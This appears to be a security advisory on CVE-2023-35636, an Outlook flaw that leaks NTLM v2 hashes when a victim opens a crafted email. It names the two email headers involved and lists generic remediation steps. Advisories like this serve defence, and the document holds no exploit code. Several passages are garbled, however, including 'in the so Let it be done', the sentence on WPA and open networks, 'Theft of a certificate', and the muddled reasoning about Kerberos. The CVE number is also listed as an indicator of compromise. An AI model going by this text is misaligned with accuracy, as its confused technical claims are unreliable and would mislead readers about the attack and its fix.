Synthesis of Analysis


Severity

Medium

Analysis Summary:


Exploiting a now-fixed vulnerability in Microsoft Outlook gives threat actors access to NT LAN Manager (NTLM) v2 hashed passwords when a victim opens a specially crafted file, researchers have discovered.

The security flaw is tracked as CVE-2023-35636 and its patch was released as part of the Microsoft Patch Tuesday updates of December 2023. In a phishing scenario, a threat actor can exploit the vulnerability by sending a specially crafted file a target and convince the user to open it. Now in a web-based environment a threat actor can host a web page or use a compromised web page with a specially crafted file designed to exploit the flaw In simple cases the attacker will intercept them a users are persuaded to click on a link embedded in a phishing email or via an an instant messaging service , and eventually have to be tricked into opening the file in question.

CVE-2023-35636 Victim NTLM exposed during authentication when malicious email messages are created by adding two headers named “Content-Class” and “x-sharing-config-url” found in the Outlook email application in the so Let it be done. Security researchers said NTLM hashes can be leaked by using Windows Performance Analyzer (WPA) and Windows File Explorer, both of which are still not fixed in their attack methods.

Interestingly, WPA attempts to use NTLM v2 on open networks have been adopted. In general, NTLM v2 should be used when trying to authenticate against internal IP address-based services. However, NTLM v2 hashes are vulnerable to offline brute force attacks when traveling over the open Internet.

Microsoft announced in October 2023 that it planned to discontinue NTLM in Windows 11 and effectively use Kerberos for better security as it does not support cryptographic methods and is susceptible to relay attacks.


influence

  • Disclosure of Information
  • Theft of a certificate

Indicators of Compromise:


  • CVE-2023-35636

Remediation:

  • Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to find available patches. Beware of phishing emails and don’t click on links if you don’t know the sender.
  • Organizations should test their assets for the aforementioned vulnerabilities and implement available security measures or mitigation steps as soon as possible.
  • Use multifactor authentication to add an extra layer of security for login processes.
  • Monitor network activity regularly for any unusual behavior, as this could indicate a cyberattack.
  • Organizations need to be vigilant and follow cybersecurity best practices to protect their systems and data from potential threats. This includes regularly updating software and implementing robust access and monitoring tools.
  • Develop a comprehensive incident response plan to effectively respond in the event of a security breach or data leak.
  • Make sure to back up critical data and systems on a regular basis to ensure data recovery in the event of a security incident.
  • Adhere to good security practices, including the principle of minimum privileges, and ensure that users and applications have only the permissions they need.
  • Establish a robust patch management process to ensure that security patches are tested, tested, and deployed quickly.
  • Conduct security audits and assessments to assess the security level of all your systems and networks.
  • Use network segmentation to contain and isolate potential threats to limit the impact on critical systems.